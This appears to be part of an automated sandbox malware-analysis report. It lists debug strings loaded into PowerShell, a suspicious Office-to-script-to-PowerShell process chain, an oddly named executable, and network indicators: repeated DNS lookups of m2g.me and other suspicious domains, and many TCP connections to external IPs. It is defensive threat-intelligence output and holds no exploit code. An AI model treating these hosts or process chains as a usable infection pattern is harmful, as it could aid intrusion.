      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: egbrowsers.pdb source: aspnet_regbrowsers.exe, 00000011.00000002.490337170.0000000005DD0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: aspnet_regbrowsers.pdbl source: explorer.exe, 00000017.00000002.639143250.000000000878F000.00000004.80000000.00040000.00000000.sdmp, niLILOT.exe, 00000019.00000000.488929503.0000000000332000.00000020.00000001.01000000.0000000A.sdmp, mstsc.exe, 0000001B.00000002.638080396.00000000026CF000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 0000001B.00000002.637568604.000000000037D000.00000004.00000020.00020000.00000000.sdmp, niLILOT.exe.17.dr
      Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000F.00000002.479528162.0000000000299000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: egbrowsers.pdbd source: aspnet_regbrowsers.exe, 00000011.00000002.490337170.0000000005DD0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_009120E2 PathFindFileNameW,PathAppendW,PathAppendW,GetFileAttributesW,PathAppendW,FindFirstFileW,PathAppendW,FindNextFileW,PathAppendW,FindNextFileW,FindClose,27_2_009120E2

      Software Vulnerabilities

      barindex
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 4x nop then jmp 007D1A1Ch17_2_007D117E
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4x nop then pop edi27_2_0008E47D
      Source: global trafficDNS query: name: m2g.me
      Source: global trafficDNS query: name: m2g.me
      Source: global trafficDNS query: name: m2g.me
      Source: global trafficDNS query: name: m2g.me
      Source: global trafficDNS query: name: m2g.me
      Source: global trafficDNS query: name: m2g.me
      Source: global trafficDNS query: name: m2g.me
      Source: global trafficDNS query: name: m2g.me
      Source: global trafficDNS query: name: m2g.me
      Source: global trafficDNS query: name: m2g.me
      Source: global trafficDNS query: name: raw.githubusercontent.com
      Source: global trafficDNS query: name: m2g.me
      Source: global trafficDNS query: name: raw.githubusercontent.com
      Source: global trafficDNS query: name: m2g.me
      Source: global trafficDNS query: name: m2g.me
      Source: global trafficDNS query: name: m2g.me
      Source: global trafficDNS query: name: www.my-tournament.live
      Source: global trafficDNS query: name: www.senior-dating-73474.bond
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 14.194.50.211:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
